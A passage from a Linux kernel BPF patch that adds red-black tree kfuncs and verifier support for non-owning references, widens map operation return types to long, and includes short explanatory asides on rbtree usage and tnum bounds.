+-static int htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+-					   void *value, u64 map_flags)
++static long htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
++					    void *value, u64 map_flags)
+ {
+ 	return __htab_lru_percpu_map_update_elem(map, key, value, map_flags,
+ 						 false);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int htab_map_delete_elem(struct bpf_map *map, void *key)
++static long htab_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct hlist_nulls_head *head;
+@@ -1398,7 +1398,7 @@ static int htab_map_delete_elem(struct bpf_map *map, void *key)
+ 	return ret;
+ }
+ 
+-static int htab_lru_map_delete_elem(struct bpf_map *map, void *key)
++static long htab_lru_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct hlist_nulls_head *head;
+@@ -2119,8 +2119,8 @@ static const struct bpf_iter_seq_info iter_seq_info = {
+ 	.seq_priv_size		= sizeof(struct bpf_iter_seq_hash_map_info),
+ };
+ 
+-static int bpf_for_each_hash_elem(struct bpf_map *map, bpf_callback_t callback_fn,
+-				  void *callback_ctx, u64 flags)
++static long bpf_for_each_hash_elem(struct bpf_map *map, bpf_callback_t callback_fn,
++				   void *callback_ctx, u64 flags)
+ {
+ 	struct bpf_htab *htab = container_of(map, struct bpf_htab, map);
+ 	struct hlist_nulls_head *head;
+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index af30c6cbd65db..5b692a5f2946b 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -1745,12 +1745,12 @@ unlock:
+ 	while (head != orig_head) {
+ 		void *obj = head;
+ 
+-		obj -= field->list_head.node_offset;
++		obj -= field->graph_root.node_offset;
+ 		head = head->next;
+ 		/* The contained type can also have resources, including a
+ 		 * bpf_list_head which needs to be freed.
+ 		 */
+-		bpf_obj_free_fields(field->list_head.value_rec, obj);
++		bpf_obj_free_fields(field->graph_root.value_rec, obj);
+ 		/* bpf_mem_free requires migrate_disable(), since we can be
+ 		 * called from map free path as well apart from BPF program (as
+ 		 * part of map ops doing bpf_obj_free_fields).
+@@ -1761,6 +1761,46 @@ unlock:
+ 	}
+ }
+ 
++/* Like rbtree_postorder_for_each_entry_safe, but 'pos' and 'n' are
++ * 'rb_node *', so field name of rb_node within containing struct is not
++ * needed.
++ *
++ * Since bpf_rb_tree's node type has a corresponding struct btf_field with
++ * graph_root.node_offset, it's not necessary to know field name
++ * or type of node struct
++ */
++#define bpf_rbtree_postorder_for_each_entry_safe(pos, n, root) \
++	for (pos = rb_first_postorder(root); \
++	    pos && ({ n = rb_next_postorder(pos); 1; }); \
++	    pos = n)
++
++void bpf_rb_root_free(const struct btf_field *field, void *rb_root,
++		      struct bpf_spin_lock *spin_lock)
++{
++	struct rb_root_cached orig_root, *root = rb_root;
++	struct rb_node *pos, *n;
++	void *obj;
++
++	BUILD_BUG_ON(sizeof(struct rb_root_cached) > sizeof(struct bpf_rb_root));
++	BUILD_BUG_ON(__alignof__(struct rb_root_cached) > __alignof__(struct bpf_rb_root));
++
++	__bpf_spin_lock_irqsave(spin_lock);
++	orig_root = *root;
++	*root = RB_ROOT_CACHED;
++	__bpf_spin_unlock_irqrestore(spin_lock);
++
++	bpf_rbtree_postorder_for_each_entry_safe(pos, n, &orig_root.rb_root) {
++		obj = pos;
++		obj -= field->graph_root.node_offset;
++
++		bpf_obj_free_fields(field->graph_root.value_rec, obj);
++
++		migrate_disable();
++		bpf_mem_free(&bpf_global_ma, obj);
++		migrate_enable();
++	}
++}
++
+ __diag_push();
+ __diag_ignore_all("-Wmissing-prototypes",
+ 		  "Global functions as their definitions will be in vmlinux BTF");
+@@ -1833,6 +1873,56 @@ struct bpf_list_node *bpf_list_pop_back(struct bpf_list_head *head)
+ 	return __bpf_list_del(head, true);
+ }
+ 
++__bpf_kfunc struct bpf_rb_node *bpf_rbtree_remove(struct bpf_rb_root *root,
++						  struct bpf_rb_node *node)
++{
++	struct rb_root_cached *r = (struct rb_root_cached *)root;
++	struct rb_node *n = (struct rb_node *)node;
++
++	rb_erase_cached(n, r);
++	RB_CLEAR_NODE(n);
++	return (struct bpf_rb_node *)n;
++}
++
++/* Need to copy rb_add_cached()'s logic here because our 'less' is a BPF
++ * program
++ */
++static void __bpf_rbtree_add(struct bpf_rb_root *root, struct bpf_rb_node *node,
++			     void *less)
++{
++	struct rb_node **link = &((struct rb_root_cached *)root)->rb_root.rb_node;
++	bpf_callback_t cb = (bpf_callback_t)less;
++	struct rb_node *parent = NULL;
++	bool leftmost = true;
++
++	while (*link) {
++		parent = *link;
++		if (cb((uintptr_t)node, (uintptr_t)parent, 0, 0, 0)) {
++			link = &parent->rb_left;
++		} else {
++			link = &parent->rb_right;
++			leftmost = false;
++		}
++	}
++
++	rb_link_node((struct rb_node *)node, parent, link);
++	rb_insert_color_cached((struct rb_node *)node,
++			       (struct rb_root_cached *)root, leftmost);
++}
++
++__bpf_kfunc void bpf_rbtree_add(struct bpf_rb_root *root, struct bpf_rb_node *node,
++				bool (less)(struct bpf_rb_node *a, const struct bpf_rb_node *b))
++{
++	__bpf_rbtree_add(root, node, (void *)less);
++}
++
++__bpf_kfunc struct bpf_rb_node *bpf_rbtree_first(struct bpf_rb_root *root)
++{
++	struct rb_root_cached *r = (struct rb_root_cached *)root;
++
++	return (struct bpf_rb_node *)rb_first_cached(r);
++}
++
+ /**
+  * bpf_task_acquire - Acquire a reference to a task. A task acquired by this
+  * kfunc which is not stored in a map as a kptr, must be released by calling
+@@ -2057,6 +2147,10 @@ BTF_ID_FLAGS(func, bpf_task_acquire, KF_ACQUIRE | KF_TRUSTED_ARGS)
+ BTF_ID_FLAGS(func, bpf_task_acquire_not_zero, KF_ACQUIRE | KF_RCU | KF_RET_NULL)
+ BTF_ID_FLAGS(func, bpf_task_kptr_get, KF_ACQUIRE | KF_KPTR_GET | KF_RET_NULL)
+ BTF_ID_FLAGS(func, bpf_task_release, KF_RELEASE)
++BTF_ID_FLAGS(func, bpf_rbtree_remove, KF_ACQUIRE)
++BTF_ID_FLAGS(func, bpf_rbtree_add)
++BTF_ID_FLAGS(func, bpf_rbtree_first, KF_RET_NULL)
++
+ #ifdef CONFIG_CGROUPS
+ BTF_ID_FLAGS(func, bpf_cgroup_acquire, KF_ACQUIRE | KF_TRUSTED_ARGS)
+ BTF_ID_FLAGS(func, bpf_cgroup_kptr_get, KF_ACQUIRE | KF_KPTR_GET | KF_RET_NULL)
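Taken together, the three kfuncs expose an intrusive, lock-protected rbtree to BPF programs, ordered by a program-supplied less() callback. A hedged sketch of program-side usage, modeled on the kernel selftests (node_data, less(), glock, groot and bpf_obj_new() follow selftest conventions and are not defined by this patch):

  struct node_data {
          long key;
          struct bpf_rb_node node;
  };

  static bool less(struct bpf_rb_node *a, const struct bpf_rb_node *b)
  {
          struct node_data *na = container_of(a, struct node_data, node);
          struct node_data *nb = container_of(b, struct node_data, node);

          return na->key < nb->key;
  }

  /* ...inside a BPF program, with groot paired with spinlock glock... */
          struct node_data *n = bpf_obj_new(typeof(*n));

          if (!n)
                  return 0;
          n->key = 42;
          bpf_spin_lock(&glock);
          bpf_rbtree_add(&groot, &n->node, less);
          bpf_spin_unlock(&glock);

The verifier changes later in this patch require every bpf_rbtree_add()/bpf_rbtree_remove()/bpf_rbtree_first() call to run under the bpf_spin_lock associated with the root.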
+diff --git a/kernel/bpf/local_storage.c b/kernel/bpf/local_storage.c
+index e90d9f63edc5d..66d8ce2ab5b34 100644
+--- a/kernel/bpf/local_storage.c
++++ b/kernel/bpf/local_storage.c
+@@ -141,8 +141,8 @@ static void *cgroup_storage_lookup_elem(struct bpf_map *_map, void *key)
+ 	return &READ_ONCE(storage->buf)->data[0];
+ }
+ 
+-static int cgroup_storage_update_elem(struct bpf_map *map, void *key,
+-				      void *value, u64 flags)
++static long cgroup_storage_update_elem(struct bpf_map *map, void *key,
++				       void *value, u64 flags)
+ {
+ 	struct bpf_cgroup_storage *storage;
+ 	struct bpf_storage_buffer *new;
+@@ -348,7 +348,7 @@ static void cgroup_storage_map_free(struct bpf_map *_map)
+ 	bpf_map_area_free(map);
+ }
+ 
+-static int cgroup_storage_delete_elem(struct bpf_map *map, void *key)
++static long cgroup_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -EINVAL;
+ }
+diff --git a/kernel/bpf/lpm_trie.c b/kernel/bpf/lpm_trie.c
+index d833496e9e426..27980506fc7d5 100644
+--- a/kernel/bpf/lpm_trie.c
++++ b/kernel/bpf/lpm_trie.c
+@@ -300,8 +300,8 @@ static struct lpm_trie_node *lpm_trie_node_alloc(const struct lpm_trie *trie,
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int trie_update_elem(struct bpf_map *map,
+-			    void *_key, void *value, u64 flags)
++static long trie_update_elem(struct bpf_map *map,
++			     void *_key, void *value, u64 flags)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct lpm_trie_node *node, *im_node = NULL, *new_node = NULL;
+@@ -431,7 +431,7 @@ out:
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int trie_delete_elem(struct bpf_map *map, void *_key)
++static long trie_delete_elem(struct bpf_map *map, void *_key)
+ {
+ 	struct lpm_trie *trie = container_of(map, struct lpm_trie, map);
+ 	struct bpf_lpm_trie_key *key = _key;
+diff --git a/kernel/bpf/queue_stack_maps.c b/kernel/bpf/queue_stack_maps.c
+index 8a5e060de63bc..80f958ff63966 100644
+--- a/kernel/bpf/queue_stack_maps.c
++++ b/kernel/bpf/queue_stack_maps.c
+@@ -95,7 +95,7 @@ static void queue_stack_map_free(struct bpf_map *map)
+ 	bpf_map_area_free(qs);
+ }
+ 
+-static int __queue_map_get(struct bpf_map *map, void *value, bool delete)
++static long __queue_map_get(struct bpf_map *map, void *value, bool delete)
+ {
+ 	struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ 	unsigned long flags;
+@@ -124,7 +124,7 @@ out:
+ }
+ 
+ 
+-static int __stack_map_get(struct bpf_map *map, void *value, bool delete)
++static long __stack_map_get(struct bpf_map *map, void *value, bool delete)
+ {
+ 	struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ 	unsigned long flags;
+@@ -156,32 +156,32 @@ out:
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_map_peek_elem(struct bpf_map *map, void *value)
++static long queue_map_peek_elem(struct bpf_map *map, void *value)
+ {
+ 	return __queue_map_get(map, value, false);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int stack_map_peek_elem(struct bpf_map *map, void *value)
++static long stack_map_peek_elem(struct bpf_map *map, void *value)
+ {
+ 	return __stack_map_get(map, value, false);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_map_pop_elem(struct bpf_map *map, void *value)
++static long queue_map_pop_elem(struct bpf_map *map, void *value)
+ {
+ 	return __queue_map_get(map, value, true);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int stack_map_pop_elem(struct bpf_map *map, void *value)
++static long stack_map_pop_elem(struct bpf_map *map, void *value)
+ {
+ 	return __stack_map_get(map, value, true);
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_stack_map_push_elem(struct bpf_map *map, void *value,
+-				     u64 flags)
++static long queue_stack_map_push_elem(struct bpf_map *map, void *value,
++				      u64 flags)
+ {
+ 	struct bpf_queue_stack *qs = bpf_queue_stack(map);
+ 	unsigned long irq_flags;
+@@ -227,14 +227,14 @@ static void *queue_stack_map_lookup_elem(struct bpf_map *map, void *key)
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_stack_map_update_elem(struct bpf_map *map, void *key,
+-				       void *value, u64 flags)
++static long queue_stack_map_update_elem(struct bpf_map *map, void *key,
++					void *value, u64 flags)
+ {
+ 	return -EINVAL;
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int queue_stack_map_delete_elem(struct bpf_map *map, void *key)
++static long queue_stack_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -EINVAL;
+ }
+diff --git a/kernel/bpf/reuseport_array.c b/kernel/bpf/reuseport_array.c
+index 82c61612f382a..d1188b0350914 100644
+--- a/kernel/bpf/reuseport_array.c
++++ b/kernel/bpf/reuseport_array.c
+@@ -59,7 +59,7 @@ static void *reuseport_array_lookup_elem(struct bpf_map *map, void *key)
+ }
+ 
+ /* Called from syscall only */
+-static int reuseport_array_delete_elem(struct bpf_map *map, void *key)
++static long reuseport_array_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct reuseport_array *array = reuseport_array(map);
+ 	u32 index = *(u32 *)key;
+diff --git a/kernel/bpf/ringbuf.c b/kernel/bpf/ringbuf.c
+index 80f4b4d88aafa..ce8ca5511ac13 100644
+--- a/kernel/bpf/ringbuf.c
++++ b/kernel/bpf/ringbuf.c
+@@ -241,13 +241,13 @@ static void *ringbuf_map_lookup_elem(struct bpf_map *map, void *key)
+ 	return ERR_PTR(-ENOTSUPP);
+ }
+ 
+-static int ringbuf_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				   u64 flags)
++static long ringbuf_map_update_elem(struct bpf_map *map, void *key, void *value,
++				    u64 flags)
+ {
+ 	return -ENOTSUPP;
+ }
+ 
+-static int ringbuf_map_delete_elem(struct bpf_map *map, void *key)
++static long ringbuf_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	return -ENOTSUPP;
+ }
+diff --git a/kernel/bpf/stackmap.c b/kernel/bpf/stackmap.c
+index aecea7451b610..496ce1695dd89 100644
+--- a/kernel/bpf/stackmap.c
++++ b/kernel/bpf/stackmap.c
+@@ -618,14 +618,14 @@ static int stack_map_get_next_key(struct bpf_map *map, void *key,
+ 	return 0;
+ }
+ 
+-static int stack_map_update_elem(struct bpf_map *map, void *key, void *value,
+-				 u64 map_flags)
++static long stack_map_update_elem(struct bpf_map *map, void *key, void *value,
++				  u64 map_flags)
+ {
+ 	return -EINVAL;
+ }
+ 
+ /* Called from syscall or from eBPF program */
+-static int stack_map_delete_elem(struct bpf_map *map, void *key)
++static long stack_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_stack_map *smap = container_of(map, struct bpf_stack_map, map);
+ 	struct stack_map_bucket *old_bucket;
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index ecca9366c7a6f..011983b39472f 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -527,9 +527,6 @@ void btf_record_free(struct btf_record *rec)
+ 		return;
+ 	for (i = 0; i < rec->cnt; i++) {
+ 		switch (rec->fields[i].type) {
+-		case BPF_SPIN_LOCK:
+-		case BPF_TIMER:
+-			break;
+ 		case BPF_KPTR_UNREF:
+ 		case BPF_KPTR_REF:
+ 			if (rec->fields[i].kptr.module)
+@@ -538,7 +535,11 @@ void btf_record_free(struct btf_record *rec)
+ 			break;
+ 		case BPF_LIST_HEAD:
+ 		case BPF_LIST_NODE:
+-			/* Nothing to release for bpf_list_head */
++		case BPF_RB_ROOT:
++		case BPF_RB_NODE:
++		case BPF_SPIN_LOCK:
++		case BPF_TIMER:
++			/* Nothing to release */
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+@@ -571,9 +572,6 @@ struct btf_record *btf_record_dup(const struct btf_record *rec)
+ 	new_rec->cnt = 0;
+ 	for (i = 0; i < rec->cnt; i++) {
+ 		switch (fields[i].type) {
+-		case BPF_SPIN_LOCK:
+-		case BPF_TIMER:
+-			break;
+ 		case BPF_KPTR_UNREF:
+ 		case BPF_KPTR_REF:
+ 			btf_get(fields[i].kptr.btf);
+@@ -584,7 +582,11 @@ struct btf_record *btf_record_dup(const struct btf_record *rec)
+ 			break;
+ 		case BPF_LIST_HEAD:
+ 		case BPF_LIST_NODE:
+-			/* Nothing to acquire for bpf_list_head */
++		case BPF_RB_ROOT:
++		case BPF_RB_NODE:
++		case BPF_SPIN_LOCK:
++		case BPF_TIMER:
++			/* Nothing to acquire */
+ 			break;
+ 		default:
+ 			ret = -EFAULT;
+@@ -664,7 +666,13 @@ void bpf_obj_free_fields(const struct btf_record *rec, void *obj)
+ 				continue;
+ 			bpf_list_head_free(field, field_ptr, obj + rec->spin_lock_off);
+ 			break;
++		case BPF_RB_ROOT:
++			if (WARN_ON_ONCE(rec->spin_lock_off < 0))
++				continue;
++			bpf_rb_root_free(field, field_ptr, obj + rec->spin_lock_off);
++			break;
+ 		case BPF_LIST_NODE:
++		case BPF_RB_NODE:
+ 			break;
+ 		default:
+ 			WARN_ON_ONCE(1);
+@@ -1005,7 +1013,8 @@ static int map_check_btf(struct bpf_map *map, const struct btf *btf,
+ 		return -EINVAL;
+ 
+ 	map->record = btf_parse_fields(btf, value_type,
+-				       BPF_SPIN_LOCK | BPF_TIMER | BPF_KPTR | BPF_LIST_HEAD,
++				       BPF_SPIN_LOCK | BPF_TIMER | BPF_KPTR | BPF_LIST_HEAD |
++				       BPF_RB_ROOT,
+ 				       map->value_size);
+ 	if (!IS_ERR_OR_NULL(map->record)) {
+ 		int i;
+@@ -1053,6 +1062,7 @@ static int map_check_btf(struct bpf_map *map, const struct btf *btf,
+ 				}
+ 				break;
+ 			case BPF_LIST_HEAD:
++			case BPF_RB_ROOT:
+ 				if (map->map_type != BPF_MAP_TYPE_HASH &&
+ 				    map->map_type != BPF_MAP_TYPE_LRU_HASH &&
+ 				    map->map_type != BPF_MAP_TYPE_ARRAY) {
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 9db6afc86733b..1c7dad0e79b92 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -190,6 +190,10 @@ struct bpf_verifier_stack_elem {
+ 
+ static int acquire_reference_state(struct bpf_verifier_env *env, int insn_idx);
+ static int release_reference(struct bpf_verifier_env *env, int ref_obj_id);
++static void invalidate_non_owning_refs(struct bpf_verifier_env *env);
++static bool in_rbtree_lock_required_cb(struct bpf_verifier_env *env);
++static int ref_set_non_owning(struct bpf_verifier_env *env,
++			      struct bpf_reg_state *reg);
+ 
+ static bool bpf_map_ptr_poisoned(const struct bpf_insn_aux_data *aux)
+ {
+@@ -456,6 +460,11 @@ static bool type_is_ptr_alloc_obj(u32 type)
+ 	return base_type(type) == PTR_TO_BTF_ID && type_flag(type) & MEM_ALLOC;
+ }
+ 
++static bool type_is_non_owning_ref(u32 type)
++{
++	return type_is_ptr_alloc_obj(type) && type_flag(type) & NON_OWN_REF;
++}
++
+ static struct btf_record *reg_btf_record(const struct bpf_reg_state *reg)
+ {
+ 	struct btf_record *rec = NULL;
+@@ -1044,6 +1053,8 @@ static void print_verifier_state(struct bpf_verifier_env *env,
+ 				verbose_a("id=%d", reg->id);
+ 			if (reg->ref_obj_id)
+ 				verbose_a("ref_obj_id=%d", reg->ref_obj_id);
++			if (type_is_non_owning_ref(reg->type))
++				verbose_a("%s", "non_own_ref");
+ 			if (t != SCALAR_VALUE)
+ 				verbose_a("off=%d", reg->off);
+ 			if (type_is_pkt_pointer(t))
+@@ -1599,6 +1610,16 @@ static void mark_ptr_not_null_reg(struct bpf_reg_state *reg)
+ 	reg->type &= ~PTR_MAYBE_NULL;
+ }
+ 
++static void mark_reg_graph_node(struct bpf_reg_state *regs, u32 regno,
++				struct btf_field_graph_root *ds_head)
++{
++	__mark_reg_known_zero(&regs[regno]);
++	regs[regno].type = PTR_TO_BTF_ID | MEM_ALLOC;
++	regs[regno].btf = ds_head->btf;
++	regs[regno].btf_id = ds_head->value_btf_id;
++	regs[regno].off = ds_head->node_offset;
++}
++
+ static bool reg_is_pkt_pointer(const struct bpf_reg_state *reg)
+ {
+ 	return type_is_pkt_pointer(reg->type);
+@@ -1769,9 +1790,9 @@ static void __reg_bound_offset(struct bpf_reg_state *reg)
+ 	struct tnum var64_off = tnum_intersect(reg->var_off,
+ 					       tnum_range(reg->umin_value,
+ 							  reg->umax_value));
+-	struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
+-						tnum_range(reg->u32_min_value,
+-							   reg->u32_max_value));
++	struct tnum var32_off = tnum_intersect(tnum_subreg(var64_off),
++					       tnum_range(reg->u32_min_value,
++							  reg->u32_max_value));
+ 
+ 	reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
+ }
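
The __reg_bound_offset hunk above derives the 32-bit subregister bounds from
var64_off — the tnum already narrowed by the 64-bit range — instead of the
stale reg->var_off, so knowledge gained at 64 bits also tightens the low 32
bits. A simplified userspace rendering of the tnum intersection involved
(the struct and helper mirror the shape of kernel/bpf/tnum.c, but this is a
sketch, not the kernel code):

    #include <stdio.h>
    #include <stdint.h>

    /* simplified tnum: bits where mask==0 are known and equal 'value' */
    struct tnum { uint64_t value; uint64_t mask; };

    static struct tnum tnum_intersect(struct tnum a, struct tnum b)
    {
        uint64_t v = a.value | b.value;   /* bits known set in either */
        uint64_t mu = a.mask & b.mask;    /* unknown only if unknown in both */
        struct tnum t = { v & ~mu, mu };
        return t;
    }

    int main(void)
    {
        /* two sources of knowledge about the same register */
        struct tnum from_64bit = { 0x00, 0xff }; /* low byte unknown, rest 0 */
        struct tnum from_range = { 0x10, 0x0f }; /* bit 4 set, low nibble unknown */
        struct tnum t = tnum_intersect(from_64bit, from_range);

        printf("value=%#llx mask=%#llx\n",
               (unsigned long long)t.value, (unsigned long long)t.mask);
        return 0;
    }
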
+@@ -3895,17 +3916,13 @@ static int check_stack_read(struct bpf_verifier_env *env,
+ 	}
+ 	/* Variable offset is prohibited for unprivileged mode for simplicity
+ 	 * since it requires corresponding support in Spectre masking for stack
+-	 * ALU. See also retrieve_ptr_limit().
++	 * ALU. See also retrieve_ptr_limit(). The check in
++	 * check_stack_access_for_ptr_arithmetic() called by
++	 * adjust_ptr_min_max_vals() prevents users from creating stack pointers
++	 * with variable offsets, therefore no check is required here. Further,
++	 * just checking it here would be insufficient as speculative stack
++	 * writes could still lead to unsafe speculative behaviour.
+ 	 */
+-	if (!env->bypass_spec_v1 && var_off) {
+-		char tn_buf[48];
+-
+-		tnum_strn(tn_buf, sizeof(tn_buf), reg->var_off);
+-		verbose(env, "R%d variable offset stack access prohibited for !root, var_off=%s\n",
+-				ptr_regno, tn_buf);
+-		return -EACCES;
+-	}
+-
+ 	if (!var_off) {
+ 		off += reg->var_off.value;
+ 		err = check_stack_read_fixed_off(env, state, off, size,
+@@ -5007,7 +5024,8 @@ static int check_ptr_to_btf_access(struct bpf_verifier_env *env,
+ 			return -EACCES;
+ 		}
+ 
+-		if (type_is_alloc(reg->type) && !reg->ref_obj_id) {
++		if (type_is_alloc(reg->type) && !type_is_non_owning_ref(reg->type) &&
++		    !reg->ref_obj_id) {
+ 			verbose(env, "verifier internal error: ref_obj_id for allocated object must be non-zero\n");
+ 			return -EFAULT;
+ 		}
+@@ -5990,9 +6008,7 @@ static int process_spin_lock(struct bpf_verifier_env *env, int regno,
+ 			cur->active_lock.ptr = btf;
+ 		cur->active_lock.id = reg->id;
+ 	} else {
+-		struct bpf_func_state *fstate = cur_func(env);
+ 		void *ptr;
+-		int i;
+ 
+ 		if (map)
+ 			ptr = map;
+@@ -6008,25 +6024,11 @@ static int process_spin_lock(struct bpf_verifier_env *env, int regno,
+ 			verbose(env, "bpf_spin_unlock of different lock\n");
+ 			return -EINVAL;
+ 		}
+-		cur->active_lock.ptr = NULL;
+-		cur->active_lock.id = 0;
+ 
+-		for (i = fstate->acquired_refs - 1; i >= 0; i--) {
+-			int err;
++		invalidate_non_owning_refs(env);
+ 
+-			/* Complain on error because this reference state cannot
+-			 * be freed before this point, as bpf_spin_lock critical
+-			 * section does not allow functions that release the
+-			 * allocated object immediately.
+-			 */
+-			if (!fstate->refs[i].release_on_unlock)
+-				continue;
+-			err = release_reference(env, fstate->refs[i].id);
+-			if (err) {
+-				verbose(env, "failed to release release_on_unlock reference");
+-				return err;
+-			}
+-		}
++		cur->active_lock.ptr = NULL;
++		cur->active_lock.id = 0;
+ 	}
+ 	return 0;
+ }
+@@ -6494,6 +6496,23 @@ found:
+ 	return 0;
+ }
+ 
++static struct btf_field *
++reg_find_field_offset(const struct bpf_reg_state *reg, s32 off, u32 fields)
++{
++	struct btf_field *field;
++	struct btf_record *rec;
++
++	rec = reg_btf_record(reg);
++	if (!rec)
++		return NULL;
++
++	field = btf_record_find(rec, off, fields);
++	if (!field)
++		return NULL;
++
++	return field;
++}
++
+ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 			   const struct bpf_reg_state *reg, int regno,
+ 			   enum bpf_arg_type arg_type)
+@@ -6515,6 +6534,18 @@ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 		 */
+ 		if (arg_type_is_dynptr(arg_type) && type == PTR_TO_STACK)
+ 			return 0;
++
++		if ((type_is_ptr_alloc_obj(type) || type_is_non_owning_ref(type)) && reg->off) {
++			if (reg_find_field_offset(reg, reg->off, BPF_GRAPH_NODE_OR_ROOT))
++				return __check_ptr_off_reg(env, reg, regno, true);
++
++			verbose(env, "R%d must have zero offset when passed to release func\n",
++				regno);
++			verbose(env, "No graph node or root found at R%d type:%s off:%d\n", regno,
++				kernel_type_name(reg->btf, reg->btf_id), reg->off);
++			return -EINVAL;
++		}
++
+ 		/* Doing check_ptr_off_reg check for the offset will catch this
+ 		 * because fixed_off_ok is false, but checking here allows us
+ 		 * to give the user a better error message.
+@@ -6549,6 +6580,7 @@ int check_func_arg_reg_off(struct bpf_verifier_env *env,
+ 	case PTR_TO_BTF_ID | PTR_TRUSTED:
+ 	case PTR_TO_BTF_ID | MEM_RCU:
+ 	case PTR_TO_BTF_ID | MEM_ALLOC | PTR_TRUSTED:
++	case PTR_TO_BTF_ID | MEM_ALLOC | NON_OWN_REF:
+ 		/* When referenced PTR_TO_BTF_ID is passed to release function,
+ 		 * its fixed offset must be 0. In the other cases, fixed offset
+ 		 * can be non-zero. This was already checked above. So pass
+@@ -6750,6 +6782,10 @@ skip_type_check:
+ 		meta->ret_btf_id = reg->btf_id;
+ 		break;
+ 	case ARG_PTR_TO_SPIN_LOCK:
++		if (in_rbtree_lock_required_cb(env)) {
++			verbose(env, "can't spin_{lock,unlock} in rbtree cb\n");
++			return -EACCES;
++		}
+ 		if (meta->func_id == BPF_FUNC_spin_lock) {
+ 			err = process_spin_lock(env, regno, true);
+ 			if (err)
+@@ -7301,6 +7337,17 @@ static int release_reference(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
++static void invalidate_non_owning_refs(struct bpf_verifier_env *env)
++{
++	struct bpf_func_state *unused;
++	struct bpf_reg_state *reg;
++
++	bpf_for_each_reg_in_vstate(env->cur_state, unused, reg, ({
++		if (type_is_non_owning_ref(reg->type))
++			__mark_reg_unknown(env, reg);
++	}));
++}
++
+ static void clear_caller_saved_regs(struct bpf_verifier_env *env,
+ 				    struct bpf_reg_state *regs)
+ {
+@@ -7322,6 +7369,8 @@ static int set_callee_state(struct bpf_verifier_env *env,
+ 			    struct bpf_func_state *caller,
+ 			    struct bpf_func_state *callee, int insn_idx);
+ 
++static bool is_callback_calling_kfunc(u32 btf_id);
++
+ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn,
+ 			     int *insn_idx, int subprog,
+ 			     set_callee_state_fn set_callee_state_cb)
+@@ -7376,10 +7425,18 @@ static int __check_func_call(struct bpf_verifier_env *env, struct bpf_insn *insn
+ 	 * interested in validating only BPF helpers that can call subprogs as
+ 	 * callbacks
+ 	 */
+-	if (set_callee_state_cb != set_callee_state && !is_callback_calling_function(insn->imm)) {
+-		verbose(env, "verifier bug: helper %s#%d is not marked as callback-calling\n",
+-			func_id_name(insn->imm), insn->imm);
+-		return -EFAULT;
++	if (set_callee_state_cb != set_callee_state) {
++		if (bpf_pseudo_kfunc_call(insn) &&
++		    !is_callback_calling_kfunc(insn->imm)) {
++			verbose(env, "verifier bug: kfunc %s#%d not marked as callback-calling\n",
++				func_id_name(insn->imm), insn->imm);
++			return -EFAULT;
++		} else if (!bpf_pseudo_kfunc_call(insn) &&
++			   !is_callback_calling_function(insn->imm)) { /* helper */
++			verbose(env, "verifier bug: helper %s#%d not marked as callback-calling\n",
++				func_id_name(insn->imm), insn->imm);
++			return -EFAULT;
++		}
+ 	}
+ 
+ 	if (insn->code == (BPF_JMP | BPF_CALL) &&
+@@ -7644,6 +7701,63 @@ static int set_user_ringbuf_callback_state(struct bpf_verifier_env *env,
+ 	return 0;
+ }
+ 
++static int set_rbtree_add_callback_state(struct bpf_verifier_env *env,
++					 struct bpf_func_state *caller,
++					 struct bpf_func_state *callee,
++					 int insn_idx)
++{
++	/* void bpf_rbtree_add(struct bpf_rb_root *root, struct bpf_rb_node *node,
++	 *                     bool (less)(struct bpf_rb_node *a, const struct bpf_rb_node *b));
++	 *
++	 * 'struct bpf_rb_node *node' arg to bpf_rbtree_add is the same PTR_TO_BTF_ID w/ offset
++	 * that 'less' callback args will be receiving. However, 'node' arg was release_reference'd
++	 * by this point, so look at 'root'
++	 */
++	struct btf_field *field;
++
++	field = reg_find_field_offset(&caller->regs[BPF_REG_1], caller->regs[BPF_REG_1].off,
++				      BPF_RB_ROOT);
++	if (!field || !field->graph_root.value_btf_id)
++		return -EFAULT;
++
++	mark_reg_graph_node(callee->regs, BPF_REG_1, &field->graph_root);
++	ref_set_non_owning(env, &callee->regs[BPF_REG_1]);
++	mark_reg_graph_node(callee->regs, BPF_REG_2, &field->graph_root);
++	ref_set_non_owning(env, &callee->regs[BPF_REG_2]);
++
++	__mark_reg_not_init(env, &callee->regs[BPF_REG_3]);
